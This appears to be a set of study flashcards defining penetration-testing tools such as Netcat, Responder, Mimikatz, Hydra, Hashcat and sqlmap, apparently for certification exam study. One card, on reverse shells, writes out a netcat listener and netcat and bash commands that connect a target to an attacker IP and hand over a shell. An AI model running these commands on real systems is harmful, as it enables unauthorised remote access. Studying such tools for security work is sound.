TOOLS

Question 1

BeEF

Answer 1

browser exploitation framework –> XSS & Injection

Question 2

Netcat

Answer 2

TCP/UDP connections

Question 3

Nikto

Answer 3

web application vulnerability scanner.

Question 4

Androzer

Answer 4

test android apps

Question 5

Swagger

Answer 5

API testing

open-source framework with large system of tools to design, build, doc, etc, REST Web Services

Question 6

W3AF

Answer 6

open source we application security scanner

Question 7

Shodan

Answer 7

cloud based tool for finding open ports and unpatched PCs

Question 8

CeWL

Answer 8

CeWL (Custom Word List generator) is a ruby app which spiders a given URL, up to a specified depth, and returns a list of words which can then be used for password crackers such as John the Ripper. Optionally, CeWL can follow external links.

Question 9

OpenVAS

Answer 9

open source vulnerability scanner

Question 10

SET

Answer 10

social engineering toolkit

Question 11

Reponder

Answer 11

Poisons LLMNR / NBT-NS/ MDNS traffic.

If a client/target cannot resolve a name via DNS it will fall back to name resolution via LLMNR (introduced in Windows Vista) and NBT-NS.

Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses.

Question 12

Mimikatz

Answer 12

a popular post-exploitation tool that dumps passwords, hashes, PINs, and Kerberos tickets from memory.

It also allows for pass-the-hash, pass-the-ticket, and the creation of Golden Kerberos tickets,

Question 13

NCRACK

Answer 13

Ncrack is a very fast ONLINE password brute-force tool from the Nmap team.

But it can only be used for a limited set of protocols:
• FTP
• Telnet
• SSH
• RDP
• VNC
• HTTP(S) (basic authentication)

Question 14

Hydra

Answer 14

Hydra is a brute-forcing tool that can crack systems using password guessing.

Question 15

Maltego

Answer 15

OSINT

visualization of data relationships gathered from OSINT efforts.

Question 16

Mimikatz

Answer 16

able to access the LSASS (Local Security Authority Subsystem Service) memory space and extract these clear-text credentials (crack passwords)

kerberos auth golden ticket

Question 17

Credential testing tools

Answer 17

Hashcat
Medusa
Hydra
CeWL
John the Ripper
Cain and Abel
Mimikatz
Patator
Dirbuster
W3AF

Question 18

Harvester

Answer 18

OSINT

gathers emails, domains, hosts employee names, open ports, banners

Question 19

Empire

Answer 19

powershell exploitation tool

Question 20

Findbugs / Spotbugs

Answer 20

a static code analyzer for Java applications

Question 21

tcpdump

Answer 21

a command-line exclusive tool that allows sniffing network traffic and packets

Question 22

Reaver

Answer 22

cracks WPS enabled wifi router (get’s PIN)

Question 23

Sqlmap

Answer 23

database vulnerability scanner

Question 24

Hashcat

Answer 24

password cracking / recovery tool, one of the fastest because it also uses the power of the GPU as well as that of the classic CPU.

Question 25

Reverse Shell

Answer 25

Netcat

  nc –lvp 4444 ----> setup a Netcat listener on the attack box

  nc 192.168.100.113 4444 –e /bin/bash ----> issue the following command on the target host to connect to our attack box

Bash

  bash -i >& /dev/tcp/192.168.100.113/4444 0>&1

Question 26

IDA

Answer 26

interactive disassembler - and debugger

generates assembly language source code from machine-executable code. It supports a variety of executable formats for different processors and operating systems. It also can be used as a debugger for Windows PE, Mac OS X Mach-O, and Linux ELF executables. A decompiler plug-in for programs compiled with a C/C++ compiler is available at extra cost.

Question 27

Software Assurance

Answer 27

Findbugs. - security audits java code
Peach. - fuzzing / dynamic
AFL. - american fuzzy lop = fuzer
SonarQube - static code analysis many languages
YASCA. - software scanner / fuzzing / plugins

Question 28

Harvester

Answer 28

OSINT to collect email addresses

Question 29

Vulnerability Scanners

Answer 29

Nikto
OpenVAS
Nessus
sqlmap
W3AF
nmap
metasploit